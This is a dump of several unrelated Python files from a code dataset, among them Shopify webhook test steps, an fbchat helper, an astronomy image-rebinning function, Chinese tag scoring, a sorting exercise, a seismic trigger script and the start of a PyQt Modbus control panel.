1\n\n\n@step(\"A product does not exist platform_product_id 12345\")\ndef product_does_not_exist(step):\n products = database.Product.get_all_by(platform_product_id=str(NEW_PRODUCT_ID))\n assert len(products) == 0\n\n\n@step('A product with platform_product_id 12345 has ([^\"]*) variants')\ndef product_has_x_variants(step, variant_count):\n product = 
database.Product.get_one_by(platform_product_id=str(NEW_PRODUCT_ID))\n assert len(product.get_variants()) == int(variant_count)\n\n\n@step(\"Product variants for platform_product_id 12345 do not exist\")\ndef product_variants_does_not_exist(step):\n product_variants = database.ProductVariant.get_all_by(product_id=12345)\n assert len(product_variants) == 0\n\n\n@step('Shopify notifies us about product update with 1 more variant')\ndef shopify_webhook_product_variant_add(step):\n data = json.dumps(REQUEST_PRODUCT_UPDATE_ADD_VARIANT)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about product update removing a variant')\ndef shopify_webhook_product_variant_remove(step):\n data = json.dumps(REQUEST_PRODUCT_UPDATE_REMOVE_VARIANT)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about product update changing a variant 1234567 name')\ndef shopify_webhook_product_variant_change(step):\n data = json.dumps(REQUEST_PRODUCT_UPDATE_CHANGE_VARIANT)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\"A product variant 1234567 has a new name\")\ndef product_variant_has_new_name(step):\n product_variant = database.ProductVariant.get_one_by(platform_variant_id=str(PRODUCT_VARIANT_1_ID))\n assert product_variant.name == NEW_PRODUCT_VARIANT_1_NAME\n\n\n@step(\"A user already exists with email johny@hbo.com\")\ndef user_order_already_exists(step):\n user = database.User.create(email=NEW_ORDER_USER_EMAIL)\n database.add(user)\n database.push()\n\n\n@step(\"There is only one user with email johny@hbo.com\")\ndef user_order_only_one(step):\n users = database.User.get_all_by(email=NEW_ORDER_USER_EMAIL)\n assert_equals(len(users), 1)\n\n\n@step('Shopify notifies us about an order creation')\ndef shopify_webhook_order_creation(step):\n data = json.dumps(REQUEST_NEW_ORDER)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\n \"We get notified by Shopify about an order creation with (?P.*), (?P.*), (?P.*), (?P.*), (?P.*)\")\ndef shopify_webhook_order_creation_with_IP(step, platform_id, ip, days_back, total_paid, currency):\n created_at = str(get_utcnow() + timedelta(days=int(str(days_back))))\n data = 
json.dumps(create_new_order(platform_id, ip, created_at, total_paid, currency))\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about an order creation with ip adress')\ndef shopify_webhook_order_creation(step):\n data = json.dumps(REQUEST_NEW_ORDER)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('We create a corresponding new order in our database')\ndef webhook_creates_order(step):\n assert_equals(world.local.response.status_code, httplib.CREATED)\n order = database.Order.get_one_by(platform_order_id=str(NEW_ORDER_ID))\n assert_equals(order.platform_order_id, str(NEW_ORDER_ID))\n # 2016-09-02T13:32:15-04:00\n assert_equals(order.purchase_timestamp, datetime.datetime(2016, 9, 2, 17, 32, 15, tzinfo=pytz.utc))\n assert_equals(order.status, database.Order.ORDER_STATUS_PURCHASED)\n assert_equals(order.user.name, NEW_ORDER_USER_NAME)\n assert_equals(len(order.product_variants), 2)\n assert_equals(order.product_variants[0].platform_variant_id, str(NEW_ORDER_PRODUCT_1_VARIANT_1_ID))\n assert_equals(order.product_variants[1].platform_variant_id, str(NEW_ORDER_PRODUCT_2_VARIANT_1_ID))\n\n\n@step('Shopify notifies us about an order fulfillment')\ndef shopify_webhook_order_fulfillment(step):\n data = json.dumps(REQUEST_FULFILLED_ORDER)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/fulfill\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\"Shopify notifies us about an order cancelation\")\ndef shopify_webhook_order_cancelation(step):\n data = json.dumps(REQUEST_CANCELED_ORDER)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\"An order already exists with platform_order_id 56789\")\ndef order_already_exists(step):\n user = database.User.create(name=NEW_ORDER_USER_NAME,\n email=NEW_ORDER_USER_EMAIL)\n product_variant1 = database.ProductVariant.get_one_by(platform_variant_id=NEW_ORDER_PRODUCT_1_VARIANT_1_ID)\n product_variant3 = database.ProductVariant.get_one_by(platform_variant_id=NEW_ORDER_PRODUCT_2_VARIANT_1_ID)\n shop = database.Shop.get_one()\n order = database.Order.create(shop=shop,\n platform_order_id=NEW_ORDER_ID,\n purchase_timestamp=NEW_ORDER_PURCHASE_TIME,\n status=database.Order.ORDER_STATUS_PURCHASED,\n user=user)\n\n order.product_variants.append(product_variant1)\n 
order.product_variants.append(product_variant3)\n database.add(order)\n database.push()\n\n\n@step('We update the corresponding order in our database')\ndef webhook_fulfils_order(step):\n assert_equals(world.local.response.status_code, 200)\n order = database.Order.get_one_by(platform_order_id=str(NEW_ORDER_ID))\n assert_equals(order.status, database.Order.ORDER_STATUS_SHIPPED)\n\n\n@step(\"We cancel the corresponding order in our database\")\ndef webhook_cancels_order(step):\n assert_equals(world.local.response.status_code, 200)\n order = database.Order.get_one_by(platform_order_id=str(NEW_ORDER_ID))\n assert_equals(order.status, database.Order.ORDER_STATUS_FAILED)\n\n\n@step('Shopify notifies us about an app uninstallation')\ndef shopify_webhook_app_uninstall(step):\n data = json.dumps(REQUEST_APP_UNINSTALLATION)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/app/uninstalled\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about theme publish')\ndef shopify_webhook_themes_publish(step):\n data = json.dumps(REQUEST_SHOP_THEME_PUBLISH)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/themes/publish\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\"We return OK code\")\ndef ok_code(step):\n assert_equals(world.local.response.status_code, httplib.OK)\n\n\n@step('We mark the shop as uninstalled')\ndef webhook_uninstalls_app(step):\n assert_equals(world.local.response.status_code, httplib.OK)\n shop = database.Shop.get_one(deleted=True)\n assert_equals(len(shop.products), 2)\n for product in shop.products:\n assert_true(product.deleted)\n assert_equals(len(shop.orders), 1)\n for order in shop.orders:\n assert_true(order.deleted)\n\n\n@step('The plugin for this shop returns blank 200')\ndef plugin_returns_404(step):\n TestAPI.i_visit_the_url(\"/plugins/product/get_by=platform_product_id&platform_product_id=12345\")\n TestAPI.assert_true(world.local.response.data, '')\n TestAPI.assert_true(world.local.response.status_code, httplib.OK)\n\n\n@step(\"An order does not exist platform_order_id 56789\")\ndef order_does_not_exist(step):\n orders = database.Order.get_all_by(platform_order_id=str(NEW_ORDER_ID))\n assert len(orders) == 0\n\n\n@step(\"There is only one order with platform_order_id 56789\")\ndef webhook_does_not_create_a_new_order(step):\n orders = database.Order.get_by(platform_order_id=str(NEW_ORDER_ID))\n assert len(orders) == 1\n\n\n@step(\"A webhook for shop update fires to change the owner of the shop\")\ndef webhook_update_shop_v1(step):\n data = json.dumps(REQUEST_SHOP_UPDATE)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/shops/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n@step(\"A webhook for shop update fires to change the 
plan of the shop\")\ndef webhook_update_shop_v2(step):\n data = json.dumps(REQUEST_SHOP_UPDATE_PLAN)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/shops/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n","sub_path":"features/steps/shopify/shopify_webhooks.py","file_name":"shopify_webhooks.py","file_ext":"py","file_size_in_byte":23370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"396436467","text":"import sys\nimport attr\nimport logging\nimport aenum\n\nlog = logging.getLogger(\"fbchat\")\n\n# Enable kw_only if the python version supports it\nkw_only = sys.version_info[:2] > (3, 5)\n\n#: Default attrs settings for classes\nattrs_default = attr.s(slots=True, kw_only=kw_only)\n\n\nclass Enum(aenum.Enum):\n \"\"\"Used internally to support enumerations\"\"\"\n\n def __repr__(self):\n # For documentation:\n return \"{}.{}\".format(type(self).__name__, self.name)\n\n @classmethod\n def _extend_if_invalid(cls, value):\n try:\n return cls(value)\n except ValueError:\n log.warning(\n \"Failed parsing {.__name__}({!r}). Extending enum.\".format(cls, value)\n )\n aenum.extend_enum(cls, \"UNKNOWN_{}\".format(value).upper(), value)\n return cls(value)\n\n\n# Frozen, so that it can be used in sets\n@attr.s(frozen=True, slots=True, kw_only=kw_only)\nclass Image:\n #: URL to the image\n url = attr.ib(type=str)\n #: Width of the image\n width = attr.ib(None, type=int)\n #: Height of the image\n height = attr.ib(None, type=int)\n\n @classmethod\n def _from_uri(cls, data):\n return cls(\n url=data[\"uri\"],\n width=int(data[\"width\"]) if data.get(\"width\") else None,\n height=int(data[\"height\"]) if data.get(\"height\") else None,\n )\n\n @classmethod\n def _from_url(cls, data):\n return cls(\n url=data[\"url\"],\n width=int(data[\"width\"]) if data.get(\"width\") else None,\n height=int(data[\"height\"]) if data.get(\"height\") else None,\n )\n\n @classmethod\n def _from_uri_or_none(cls, data):\n if data is None:\n return None\n if data.get(\"uri\") is None:\n return None\n return cls._from_uri(data)\n\n @classmethod\n def _from_url_or_none(cls, data):\n if data is None:\n return None\n if data.get(\"url\") is None:\n return None\n return cls._from_url(data)\n","sub_path":"fbchat/_core.py","file_name":"_core.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"445334722","text":"#\n# Required CIAO 4.5/contrib package\n#\nfrom ciao_contrib.runtool import *\nimport os\nfrom math import floor, ceil, modf\n\n# rebin_img function to make an image with the center pixel at the region centroid\n# infile - input psf event file from SAOtrace\n# outfile - output file, binned psf image\n# binsize - binning of the image\n# nsize - size of the image in image pixels\n# xcenter, ycenter - initial centroid\n\n\ndef rebin_img(\n infile=\"evt2.fits\",\n outfile=\"test.fits\",\n binsize=0.25,\n nsize=64,\n xcen=4060.0,\n ycen=4090.0,\n):\n\n N = nsize\n B = binsize\n\n xcen3 = xcen\n ycen3 = ycen\n # nearest half-pixel vertex\n # xcen3 = floor(xcen-B/2.0) + round(modf(xcen- B/2.0)[0]*2.0/B)*B/2.0\n # ycen3 = floor(ycen-B/2.0) + round(modf(ycen- B/2.0)[0]*2.0/B)*B/2.0\n\n px = floor((xcen - 
floor(xcen)) / binsize) * binsize\n    xcen3 = floor(xcen3) + px\n    #\n    py = floor((ycen - floor(ycen)) / binsize) * binsize\n    ycen3 = floor(ycen3) + py\n\n    ##get the nearest vertex\n    # if abs(xcen3-xcen)>abs(xcen3-xcen+B/2):\n    #    xcen3=xcen3+B/2\n    #\n    # if abs(ycen3-ycen)>abs(ycen3-ycen+B):\n    #    ycen3=ycen3+B/2\n    # print(xcen3,ycen3,xcen4,ycen4,xcen,ycen)\n\n    if N % 2 == 0:\n        xmin = round(xcen3 - (N * B) * 0.5, 2)\n        xmax = round(xcen3 + (N * B) * 0.5, 2)\n        ymin = round(ycen3 - (N * B) * 0.5, 2)\n        ymax = round(ycen3 + (N * B) * 0.5, 2)\n    else:\n        xmin = round(xcen3 - ((N - 1) * B) * 0.5, 2)\n        xmax = round(xcen3 + ((N + 1) * B) * 0.5, 2)\n        ymin = round(ycen3 - ((N - 1) * B) * 0.5, 2)\n        ymax = round(ycen3 + ((N + 1) * B) * 0.5, 2)\n    newfile = \"{}[bin x={}:{}:#{},y={}:{}:#{}][opt type=i4]\".format(\n        infile, xmin, xmax, N, ymin, ymax, N\n    )\n    print(newfile)\n\n    dmcopy.punlearn()\n    dmcopy(newfile, outfile, clobber=True)\n    return (xcen3, ycen3)\n","sub_path":"input_prep/rebin_img.py","file_name":"rebin_img.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"399992870","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport jieba\nfrom app.models import User, R_Img_Label, R_User_Img, R_User_Img_Label\nfrom app import db\ncount_users=10\ndef is_chinese(data):\n\tfor ch in data:\n\t\tif '\\u4e00' <= ch <= '\\u9fff':\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\ndef cut_chinese_words(words):\n\t'''\n\twords: [{'label_name': '...'}]\n\t'''\n\tdata=[]\n\tfor word in words:\n\t\tlabel=word.get('label_name')\n\t\tdata.append(word)\n\t\tif label is None:\n\t\t\tcontinue\n\t\tif is_chinese(label):\n\t\t\t'''Search-engine mode by default, to extract more terms'''\n\t\t\tseg_list=jieba.cut_for_search(label)\n\t\t\tlabs=[a for a in seg_list]\n\t\t\tfor lab in labs:\n\t\t\t\tinfo={}\n\t\t\t\tinfo['label_name']=lab\n\t\t\t\tdata.append(info)\n\treturn data\n\n\n\ndef tag_images(DN, DM, DX):\n\tu1=1\n\tu2=2\n\tplabels=[]\n\tfor i in DN:\n\t\tdata = DX.get(i)\n\t\tfor j in data:\n\t\t\tp = [int(i)]\t\t\t# image id\n\t\t\t'''\n\t\t\tif DM[i] - u1 == 0:\n\t\t\t\tu1=u1+1\n\t\t\ttemp=float(DN[i]*DN[i]*DM[i])/pow((DM[i]-u1),2)\n\t\t\tvalue=float(data[j]*data[j])/float(DN[i]*DM[i])*pow(temp,1.0/u2)\n\t\t\t'''\n\t\t\tvalue=pow(data[j],2)*pow(u1,1.0/u2)*pow(DM[i]*DN[i], (1.0/u2 - 1))\n\t\t\tp.append(int(j))\t\t\t# label id\n\t\t\tp.append(value)\n\t\t\tplabels.append(p)\n\treturn plabels\n\n\ndef up_R_Img_Label():\n\tcount_imgs_users={}\t\t\t\t\t\t# number of users who tagged each image\t{'img_id': num}\n\tfor a in R_User_Img.query.all():\n\t\tcount_imgs_users[str(a.img_id)]=R_User_Img.query.filter_by(img_id=a.img_id).count()\n\timg_ids=[int(a) for a in count_imgs_users]\n\tcount_imgs_total_label={}\n\tcount_imgs_label_num={}\n\tfor img_id in img_ids:\n\t\tsum=0\n\t\tlabel_data={}\n\t\tfor a in R_Img_Label.query.filter_by(img_id=img_id):\n\t\t\tsum = sum + a.count\n\t\t\tlabel_data[str(a.label_id)]=a.count\n\t\tcount_imgs_total_label[str(img_id)] = sum\n\t\tcount_imgs_label_num[str(img_id)] = label_data\n\n\tresult = tag_images(count_imgs_users, count_imgs_total_label, count_imgs_label_num)\n\tfor data in result:\n\t\tr = R_Img_Label.query.filter_by(img_id=data[0]).filter_by(label_id=data[1]).first()\n\t\tr.confidence = data[2]\n\t\tdb.session.commit()\n\tnum_user = count_users\n\tnum_labels = 5\n\tfor id in img_ids:\n\t\tif(count_imgs_users[str(id)] >= num_user):\n\t\t\trs = 
R_Img_Label.query.filter_by(img_id=id).\\\n\t\t\t\torder_by(R_Img_Label.confidence.desc()).limit(num_labels)\n\t\t\tfor r in rs:\n\t\t\t\tr.accepted=True\n\tdb.session.commit()","sub_path":"app/img/tag_image.py","file_name":"tag_image.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"399843836","text":"import os\nimport zipfile\n\nfor root, dirs, files in os.walk('/home/prajwaljpj/Downloads/gnani.ai/database'):\n    for each in files: \n        if each.endswith(\".zip\"):\n            print(root, dirs, each)\n            zip_ref = zipfile.ZipFile(root+'/'+each, 'r')\n            zip_ref.extractall(root)\n            zip_ref.close()\n","sub_path":"unzip.py","file_name":"unzip.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"250392174","text":"# ------------------------------------------------------------------------------\n# Functions for processing shorthand html tags.\n# ------------------------------------------------------------------------------\n\nimport html\nimport re\n\nfrom . import nodes\nfrom . import parsers\nfrom . import utils\n\n\n\n# Void elements have no content or closing tag.\nhtml_void_tags = \"\"\"\n    area base br col embed hr img input link meta param source track wbr\n\"\"\".split()\n\n\n# Leaf elements cannot contain nested block-level content.\nhtml_leaf_tags = \"\"\"\n    dt h1 h2 h3 h4 h5 h6 p title\n    a abbr acronym audio b bdi bdo big button canvas cite code data datalist\n    del dfn em i iframe ins kbd label map mark meter noscript \n    object output picture progress q ruby s samp select slot small span \n    strong sub sup svg template textarea time u tt var video \n\"\"\".split()\n\n\n# Raw elements contain text which should be included in the output as-is.\nhtml_raw_tags = \"script style\".split()\n\n\n# Process a tagged block.\ndef process(header, content, meta):\n    match = re.fullmatch(r':([^ ]+)([ ].+)?', header)\n    tag = match.group(1)\n    argstring = match.group(2) or ''\n    pargs, kwargs = utils.ArgParser().parse(argstring)\n\n    if tag == 'pre':\n        text = html.escape(str(content))\n        node = nodes.Node('pre', kwargs, text=text)\n    elif tag == 'a':\n        node = nodes.Node('a', kwargs)\n        node.children = parsers.InlineParser().parse(content, meta)\n        if pargs:\n            node.attributes['href'] = pargs[0]\n    elif tag == 'img':\n        node = nodes.Node('img', kwargs, is_void=True)\n        if not 'src' in kwargs:\n            node.attributes['src'] = pargs[0] if pargs else ''\n        if not 'alt' in kwargs:\n            node.attributes['alt'] = html.escape(str(content).replace('\\n', ' '))\n    elif tag in html_void_tags:\n        node = nodes.Node(tag, kwargs, is_void=True)\n    elif tag in html_leaf_tags:\n        node = nodes.Node(tag, kwargs)\n        node.children = parsers.InlineParser().parse(content, meta)\n    elif tag in html_raw_tags:\n        node = nodes.Node(tag, kwargs, text=str(content))\n    else:\n        node = nodes.Node(tag, kwargs)\n        node.children = parsers.BlockParser().parse(content, meta)\n\n    if 'nl2lb' in pargs or 'nl2br' in pargs:\n        node = nodes.LinebreakNode().append_child(node)\n    return node\n\n","sub_path":"syntext/shorthand.py","file_name":"shorthand.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"553287225","text":"\n\nfrom xai.brain.wordbase.adjectives._dirty import _DIRTY\n\n#class header\nclass _DIRTYING(_DIRTY, ):\n\tdef __init__(self,): \n\t\t_DIRTY.__init__(self)\n\t\tself.name = 
\"DIRTYING\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"dirty\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_dirtying.py","file_name":"_dirtying.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"571872948","text":"\"\"\"\n给定一个有n个对象(包括k种不同的颜色,并按照1到k进行编号)的数组,将对象进行分类使相同颜色的对象相邻,并按照1,2,...k的顺序进行排序。\n\n样例\n给出colors=[3, 2, 2, 1, 4],k=4, 你的代码应该在原地操作使得数组变成[1, 2, 2, 3, 4]\n\n挑战\n一个相当直接的解决方案是使用计数排序扫描2遍的算法。这样你会花费O(k)的额外空间。你否能在不使用额外空间的情况下完成?\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param colors: A list of integer\n @param k: An integer\n @return: nothing\n \"\"\"\n # 这道题k好像没用到,直接套用快排模板就行了\n # time:764ms\n def sortColors2(self, colors, k):\n # write your code here\n\n self.quick_sort(colors, 0, len(colors) - 1)\n\n def quick_sort(self, Array, left, right):\n if left >= right:\n return\n low, high = left, right\n key = Array[low]\n while left < right:\n while left < right and Array[right] > key:\n right -= 1\n Array[left] = Array[right]\n while left < right and Array[left] <= key:\n left += 1\n Array[right] = Array[left]\n Array[right] = key\n self.quick_sort(Array, low, left - 1)\n self.quick_sort(Array, left + 1, high)","sub_path":"算法 - 排序/排序/143.排颜色 II.py","file_name":"143.排颜色 II.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"495713258","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis script will run the trigger stage of QuakeMigrate.\n\n\"\"\"\n\n# Import required modules\nimport QMigrate.signal.trigger as qtrigger\nimport QMigrate.io.quakeio as qio\n\n# Set i/o paths\nstation_file = \"/path/to/station_file\"\nout_path = \"/path/to/output\"\nrun_name = \"name_of_run\"\n\n# Time period over which to run trigger\nstart_time = \"2018-001T00:00:00.0\"\nend_time = \"2018-002T00:00:00.00\"\n\n# Read in station files\nstations = qio.stations(station_file)\n\n# Create a new instance of Trigger\ntrig = qtrigger.Trigger(out_path, run_name, stations)\n\n# Set trigger parameters - for a complete list and guidance on how to choose\n# a suitable set of parameters, please consult the documentation\ntrig.normalise_coalescence = True\ntrig.marginal_window = 1.\ntrig.minimum_repeat = 30.\ntrig.detection_threshold = 1.75\n\n# Run trigger\ntrig.trigger(start_time, end_time, savefig=False)\n","sub_path":"example_running_scripts/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"521108959","text":"import sys\nfrom panel import Ui_MainWindow\nfrom PyQt5 import QtWidgets,QtCore\nfrom PyQt5.QtCore import QThread, pyqtSignal\nfrom PyQt5.QtCore import Qt\nfrom pyqt_led.pyqt_led import Led # From https://github.com/Neur1n/pyqt_led\n\nimport serial\nimport modbus_tk\nimport modbus_tk.defines as cst\nfrom modbus_tk import modbus_rtu\nimport time\n\nimport os\nimport yaml\n\nclass switch:\n def __init__(self, addr, port, master): # 站号, 地址, 主线程中modbus设备的实例\n self.addr = addr\n self.port = port\n self.master = master\n self.state = -1\n print(\"Init switch at {0} {1}\".format(addr,port))\n def check_on(self):\n self.state = self.master.execute(self.addr, cst.READ_DISCRETE_INPUTS, self.port-1, 1)[0]\n return self.state\n\nclass motor:\n def __init__(self, addr, bridge, master): # 站号, 四个继电器的地址\n self.addr = addr\n self.bridge = bridge\n self.master = master\n (h1,h2,l1,l2) = 
bridge\n        self.h1, self.h2, self.l1, self.l2 = h1, h2, l1, l2  # keep the relay coil numbers for the methods below\n        print(\"Init motor at {0} {1}\".format(addr, bridge))\n    def stop(self):\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.h1-1, output_value=0)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.h2-1, output_value=0)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.l1-1, output_value=0)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.l2-1, output_value=0)\n    def forward(self):\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.h1-1, output_value=1)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.h2-1, output_value=0)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.l1-1, output_value=0)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.l2-1, output_value=1)\n    def reverse(self):\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.h1-1, output_value=0)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.h2-1, output_value=1)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.l1-1, output_value=1)\n        self.master.execute(self.addr, cst.WRITE_SINGLE_COIL, self.l2-1, output_value=0)\n\nclass entranceThread(QThread):\n    updated = pyqtSignal(str)\n    start_work = pyqtSignal(bool)\n    def __init__(self):\n        super(entranceThread, self).__init__()\n        self.ser = None\n        self.run_flag = False\n    def setser(self, ser):\n        self.ser = ser\n        self.run_flag = True\n        self.start()\n    def threadStop(self):\n        self.run_flag = False\n    def run(self):\n        print(\"Start Reading Entrance\")\n        self.run_flag = True\n        while self.run_flag:\n            try:\n                if self.ser.in_waiting:\n                    read_str=self.ser.read(self.ser.in_waiting )\n                    # read_str=self.ser.read(self.ser.in_waiting ).hex()\n                    self.updated.emit(str(\"[Read ] {}\".format(read_str)))\n                    if str(read_str,'utf-8').split(\"'\")[0] == \"ABCD\":\n                        self.start_work.emit(bool(True))\n                time.sleep(0.1) # sleep so polling does not peg the CPU\n            except Exception as e:\n                print(str(e))\n\nclass workThread(QThread):\n    updated = pyqtSignal(str)\n    def __init__(self):\n        super(workThread, self).__init__()\n        self.motor_1 = None\n        self.switch_1 = None\n\n    def setdevice(self, motor_1, switch_1):\n        self.motor_1 = motor_1\n        self.switch_1 = switch_1\n        self.start()\n\n    def run(self):\n        print(\"Start Working thread\")\n        # while True:\n        #     print(self.switch_1.check_on())\n        self.updated.emit(str(\"[Read ] switch at {0}, state = {1}\".format(self.switch_1.port, self.switch_1.check_on())))\n        print(\"Working thread died\")\n\n    \n\nclass MyWindow(QtWidgets.QMainWindow,Ui_MainWindow):\n    \"\"\"\n    init:\n        set UI\n        set led\n        set self.serial_flag\n        add serial_port item\n        set logger\n        set io_read/write_from,io_read/write_to \n    \"\"\"\n    def __init__(self):\n        # set UI\n        super(MyWindow,self).__init__() # diamond inheritance\n        self.setupUi(self)\n        self.led_widget._layout = QtWidgets.QGridLayout(self.led_widget)\n        self._create_leds()\n        self._arrange_leds()\n        for i in range (1,21):\n            exec('self.serial_port.addItem(\"/dev/ttyS{0}\")'.format(i))\n        for i in range (1,21):\n            exec('self.modbus_port.addItem(\"/dev/ttyS{0}\")'.format(i))\n        self.logger = modbus_tk.utils.create_logger(\"console\")\n        self.serial_flag = False\n\n    #call after serial&master init\n    def init_hardware(self):\n        fileNamePath = os.path.split(os.path.realpath(__file__))[0]\n        yamlPath = os.path.join(fileNamePath,'./config.yaml')\n        config = None\n        try:\n            with open(yamlPath,'r',encoding='utf-8') as f:\n                result = f.read()\n                config = yaml.load(result,Loader=yaml.FullLoader)\n            # init motor\n            self.motor_1 = motor(config['digital_device']['addr'],tuple(config['digital_device']['output']['d01']), self.master)\n            # init 
